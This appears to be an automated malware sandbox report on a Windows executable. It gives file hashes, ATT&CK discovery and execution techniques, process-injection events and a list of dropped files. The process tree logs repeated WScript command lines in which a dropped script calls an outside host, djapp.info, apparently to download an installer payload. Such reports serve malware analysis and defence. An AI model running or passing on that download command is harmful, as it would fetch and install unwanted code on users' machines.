19ce607fdaa08c054eb62794ca812ba81ff3684b6b278f3f30b68219db3df2d0

Analysis

max time kernel
84s
max time network
39s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
12-09-2024 03:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe
Size

184KB
MD5

dbc15efc4066c6b8ab27b3014e6dd2ad
SHA1

a2e358f0e180f175c5ef66380448137d71a0d879
SHA256

19ce607fdaa08c054eb62794ca812ba81ff3684b6b278f3f30b68219db3df2d0
SHA512

a7d73f4f4b7602c38859a7dfa6d8223259fd7b705f089a061bdcfac37996539bc34e6748639ae8c9a53c6cfc189d3ef8c86826bb0ce90bda5d188a522367feff
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO32d:/7BSH8zUB+nGESaaRvoB7FJNndnHd

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2992	WScript.exe
8	2992	WScript.exe
10	2992	WScript.exe
12	2844	WScript.exe
13	2844	WScript.exe
15	2508	WScript.exe
16	2508	WScript.exe
18	3028	WScript.exe
19	3028	WScript.exe
21	352	WScript.exe
22	352	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2116 wrote to memory of 2992	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	29
PID 2116 wrote to memory of 2992	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	29
PID 2116 wrote to memory of 2992	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	29
PID 2116 wrote to memory of 2992	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	29
PID 2116 wrote to memory of 2844	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	31
PID 2116 wrote to memory of 2844	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	31
PID 2116 wrote to memory of 2844	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	31
PID 2116 wrote to memory of 2844	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	31
PID 2116 wrote to memory of 2508	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	33
PID 2116 wrote to memory of 2508	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	33
PID 2116 wrote to memory of 2508	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	33
PID 2116 wrote to memory of 2508	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	33
PID 2116 wrote to memory of 3028	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	35
PID 2116 wrote to memory of 3028	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	35
PID 2116 wrote to memory of 3028	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	35
PID 2116 wrote to memory of 3028	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	35
PID 2116 wrote to memory of 352	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	37
PID 2116 wrote to memory of 352	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	37
PID 2116 wrote to memory of 352	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	37
PID 2116 wrote to memory of 352	2116	dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe	37

C:\Users\Admin\AppData\Local\Temp\dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\dbc15efc4066c6b8ab27b3014e6dd2ad_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3F7.js" http://www.djapp.info/?domain=aytmQmRoqO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf3F7.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2992
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3F7.js" http://www.djapp.info/?domain=aytmQmRoqO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf3F7.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2844
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3F7.js" http://www.djapp.info/?domain=aytmQmRoqO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf3F7.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2508
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3F7.js" http://www.djapp.info/?domain=aytmQmRoqO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf3F7.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3028
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3F7.js" http://www.djapp.info/?domain=aytmQmRoqO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf3F7.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
e3a7f28241bd5faf2997f889ede60850

SHA1
9ed48258355e6cd95ecb5e421cb818d075027a86

SHA256
0adc7bb0b52cd536d166923d6fa6b5039b18ebcfb3d868fb440d413aca76337f

SHA512
dc317e65789957085ce6029e9fac3a3dc55f6aa71bbf7f412fe8821b6a62a839415eab37aa3e428cdf8d9946c866fd0ab4ad1d8df7ab1b70474143e3aff20c1e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
74eedd9879789e70aa8f2fed0a6184a0

SHA1
1c803c48784a9d9c8e8054db14aa3c0e61169a0c

SHA256
627e211c9c90dd534a9c5d27b6f84be80492a954877aa71cd91c0056c9464aaa

SHA512
4c7277c8964746466520c9a740dcba549d3e3d09c7b76feb2f617f162a59116eed710bfe69bb679e4ad968b76d4c7f94af0603b90b486a57b62273249ca2dbf5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
1c07a90f952086d50a8fe8c0c989ced2

SHA1
76a4dbfeac10ffcd0fd233199048188a1dd18be7

SHA256
d0bc2c09c88a7820dab7bda5c79f9e3ace82a4a35c998a42b9ee0ca47dd52493

SHA512
209f063076aa5b8ff816f9a978942199c662f83b8ef622d4f4649e076766ca9a5cfc338770b9acce560ff008fc0976d360649813892c94f12ef3ef9eee2d3a9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\domain_profile[1].htm

Filesize
6KB

MD5
b15f2cc92b85be5777af2ec549f49ecd

SHA1
da474d28d7ef6e4aeec24cc8f9b644019c1e0713

SHA256
7e884db5fba5effde82fe9f59459d6cfb5c5f10a441619ac90470828109c8255

SHA512
c9d51c31a0aacb714b1b4748a558a0aa971065b7fd0bc20cfb39e99db674ddcfb444777124e79be44f81592632f5262165343638a70433b170c2156a2b83752d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\domain_profile[1].htm

Filesize
6KB

MD5
7236144ca566b79ce1493d5566ef7484

SHA1
1853ea4e9f69f290cd6e1eba2d82d6cfdf914ede

SHA256
46c061043886d6474b4fde77534d9cc80ac0ff49c821ee343dddd402d7e4f8f2

SHA512
dc9ee67a7b03e523d0ca4ce53ddbd022f7f128543c25f229497a00bfc7103c6783eccc1090b93db1dc1cb9f0bd6345c1af7503a2a7866896ba62405fa96ec18d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LW44N8OS\domain_profile[1].htm

Filesize
40KB

MD5
db6e40ff008d09ebb95f7bbb61eaded0

SHA1
febb3569b48ef38aab797e38532759c2b10d4c61

SHA256
f760907a787fd38d4225b284a42e99a5bd87d7f177c5c6314af6b713c13c1c0f

SHA512
1cd6ae1302ff77e1389fa815e1721a47ce9d04f2a31885b64b8dc5c53f7b5191426dd67f1f7df878dadf321dff584f4648d291894e3ba2b50911996420429c9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LW44N8OS\domain_profile[1].htm

Filesize
40KB

MD5
d976f4021715e85e2b9ae21b6018a3cf

SHA1
3ce8dfc2fc212ad0a7fa7b1ab416860ce07dd46c

SHA256
ef8b9b776d86998b5e66ec6966822d6adde883316fd49094484d13255752e9ca

SHA512
6a836c95734f8807dbca90ec41c159cf48da0f580d9be76dfd80fcdbfcede75768f02346280582b5fe935cac7cf6ba08779859720940a6e92bf1e9620e34b568

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3350.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4BB1.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf3F7.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\55A1QZKE.txt

Filesize
175B

MD5
9ee7c1a88e15040a1c78b2d41f3aeb1e

SHA1
17edd73af9638a572edf0935730b4ef6f68bbe0e

SHA256
a25b3866e6cc37a112b81c06a94a632549c49834f527995a998c801f611f2ed9

SHA512
581c5c641d2eadd72f8a0679271c78145d1b79b108855f8f79683d92d85eb739f165c4fc8379160b988fa39e32b273cfa778271b7f65514a6dba9287d0b47b1d

Download Submit